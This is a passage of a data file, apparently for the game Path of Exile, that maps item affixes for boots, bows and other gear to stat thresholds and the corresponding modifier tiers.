"#% reduced Chaos Damage taken over time": [(30, '(5 - 6) to Chaos Resistance'), (60, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Physical Damage taken": [(100, '(-20 - -16) Physical Damage taken from Attacks'), (200, '(-25 - -21) Physical Damage taken from Attacks'), (500, '(-40 - -35) Physical Damage taken from Attacks')],
"+# to Armour": [(200, '(15 - 20) to Armour'), (400, '(21 - 30) to Armour'), (600, '(31 - 40) to Armour'), (800, '(41 - 55) to Armour'), (1100, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1450, '(56 - 70) to Armour\n3% additional Physical Damage Reduction'), (2000, '(56 - 70) to Armour\n4% additional Physical Damage Reduction')],
"+# to Armour during Soul Gain Prevention": [(8000, '(21 - 30) to Armour'), (15000, '(31 - 40) to Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n10% chance to gain a Frenzy Charge on Hit')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(175, '(15 - 20) to Evasion Rating'), (375, '(21 - 30) to Evasion Rating'), (575, '(31 - 40) to Evasion Rating'), (775, '(41 - 55) to Evasion Rating'), (1050, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1400, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks'), (2000, '(56 - 70) to Evasion Rating\n4 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n15% chance to gain a Power Charge on Critical Strike')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, "(18 - 20) to Strength\nGain an Endurance Charge every second if you've been Hit Recently")],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (100, '(11 - 14) to maximum Energy Shield'), (150, '(15 - 18) to maximum Energy Shield'), (200, '(19 - 23) to maximum Energy Shield'), (300, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (370, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n1.0% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (475, '(5 - 6)% increased maximum Life'), (1000, '(8 - 10)% increased maximum Life')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (500, '(7 - 8)% increased maximum Mana')],
"+# to maximum number of Zombies": [(1, 'Minions deal 8% increased Damage'), (2, 'Minions deal (9 - 10)% increased Damage'), (5, 'Minions deal (11 - 12)% increased Damage\nZombies deal (30 - 35)% increased Damage\nSkeletons deal (30 - 35)% increased Damage')],
"+#% Chaos Resistance against Damage Over Time": [(50, '(5 - 6) to Chaos Resistance'), (100, '(7 - 8) to Chaos Resistance'), (200, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n(5 - 8)% of Physical Damage from Hits taken as Chaos Damage')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n(7 - 10)% of Physical Damage from Hits taken as Cold Damage')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n(7 - 10)% of Physical Damage from Hits taken as Fire Damage')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n(7 - 10)% of Physical Damage from Hits taken as Lightning Damage')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Gain #% of Maximum Life as Extra Maximum Energy Shield": [(26, '(11 - 14) to maximum Energy Shield'), (50, '(15 - 18) to maximum Energy Shield\nGain 3% of Maximum Life as Extra Maximum Energy Shield')],
"Has 1 Abyssal Socket": [(1, '(2 - 3)% additional Physical Damage Reduction against Abyssal Monsters'), (2, '(4 - 5)% additional Physical Damage Reduction against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Item drops on Death if Equipped by an Animated Guardian": [(2, '15 to Animated Guardian Elemental Resistances'), (5, 'Item drops on Death if Equipped by an Animated Guardian')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Recover #% of Mana and Energy Shield when you Focus": [(85, '(19 - 21)% increased Mana Regeneration Rate\n(8 - 9)% increased Energy Shield Recharge Rate'), (150, '(22 - 24)% increased Mana Regeneration Rate\n(10 - 11)% increased Energy Shield Recharge Rate')],
"Reflects # Physical Damage to Melee Attackers": [(300, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (450, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (550, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\nAttacks have (0.5 - 1.0) to Critical Strike Chance\nSpells have (0.5 - 1.0) to Critical Strike Chance ')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Gems are Supported by Level # Arcane Surge": [(1, '(12 - 13)% increased Spell Damage'), (2, '(14 - 16)% increased Spell Damage'), (5, '(17 - 20)% increased Spell Damage')],
"Socketed Gems are Supported by Level # Maim": [(1, '(12 - 13)% increased Attack Damage'), (2, '(14 - 16)% increased Attack Damage'), (5, '(17 - 20)% increased Attack Damage')],
"You can apply an additional Curse": [(1, 'Curse Skills have (10 - 15)% increased Skill Effect Duration'), (2, 'Curse Skills have (16 - 20)% increased Skill Effect Duration'), (5, '(6 - 10)% increased Effect of your Curses')],
},
"Boots": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while moving": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to Dodge Attack Hits": [(25, '2% chance to Dodge Attack Hits'), (50, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(20, '2% chance to Dodge Spell Hits'), (50, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain an additional Vaal Soul on Kill": [(11, '(2 - 3)% chance to gain an additional Vaal Soul on Kill'), (22, '(4 - 5)% chance to gain an additional Vaal Soul on Kill'), (50, '(5 - 7)% increased Movement Speed if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Effect of non-Damaging Ailments on Enemies": [(80, '(7 - 10)% increased Effect of Chill\n(7 - 10)% increased Effect of Shock'), (100, '(11 - 15)% increased Effect of Chill\n(11 - 15)% increased Effect of Shock')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Vitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Mana Regeneration Rate while moving": [(100, '(22 - 24)% increased Mana Regeneration Rate'), (180, '(25 - 27)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n(2.52 - 3.0) Mana Regenerated per second')],
"#% increased Movement Speed": [(50, '4% increased Movement Speed'), (70, '(5 - 6)% increased Movement Speed'), (95, '(7 - 8)% increased Movement Speed'), (120, '(7 - 8)% increased Movement Speed\nOnslaught')],
"#% increased Movement Speed if you've Hit an Enemy Recently": [(12, '4% increased Movement Speed'), (30, '(5 - 6)% increased Movement Speed')],
"#% increased Movement speed while on Burning, Chilled or Shocked ground": [(13, '4% increased Movement Speed'), (25, '(5 - 6)% increased Movement Speed'), (50, '(7 - 8)% increased Movement Speed\nUnaffected by Burning Ground\nUnaffected by Chilled Ground\nUnaffected by Shocked Ground')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(22 - 25)% increased Stun and Block Recovery\nUnwavering Stance')],
"#% increased Totem Placement speed": [(75, '(2 - 3)% increased Totem Placement speed'), (150, '(4 - 5)% increased Totem Placement speed')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"#% reduced Elemental Damage Taken while stationary": [(6, '(3 - 4) to all Elemental Resistances'), (12, '(5 - 6) to all Elemental Resistances'), (50, '(7 - 8) to all Elemental Resistances')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n5% increased Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n1 to Maximum Endurance Charges')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+# to maximum number of Spectres": [(1, 'Minions deal (11 - 12)% increased Damage'), (2, 'Minions deal (13 - 14)% increased Damage'), (5, 'Minions deal (15 - 16)% increased Damage\nSpectres have (30 - 35)% increased Damage')],
"+#% chance to Dodge Attack Hits while Focussed": [(65, '1% chance to Dodge Attack Hits'), (100, '2% chance to Dodge Attack Hits')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Cannot be Poisoned": [(1, '(14 - 16)% chance to Avoid being Poisoned'), (2, '(18 - 21)% chance to Avoid being Poisoned'), (5, '(22 - 25)% chance to Avoid being Poisoned')],
"Drops Burning Ground while moving, dealing # Fire Damage per second": [(2600, '(10 - 11)% increased Burning Damage'), (5100, '(12 - 13)% increased Burning Damage'), (10000, '(14 - 15)% increased Burning Damage\n1% increased Fire Damage per 20 Strength')],
"Has 1 Abyssal Socket": [(1, '(2 - 3)% additional Physical Damage Reduction against Abyssal Monsters'), (2, '(4 - 5)% additional Physical Damage Reduction against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Non-Vaal Skills deal #% increased Damage during Soul Gain Prevention": [(150, 'Vaal Skills deal (13 - 16)% increased Damage'), (500, 'Vaal Skills deal (17 - 21)% increased Damage')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
"You are Immune to Ailments while Focussed": [(2, '(10 - 12)% chance to Avoid Elemental Ailments'), (5, '(13 - 15)% chance to Avoid Elemental Ailments')],
"You have Onslaught during Soul Gain Prevention": [(2, '4% increased Movement Speed'), (5, '(5 - 6)% increased Movement Speed')],
},
"Bow": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
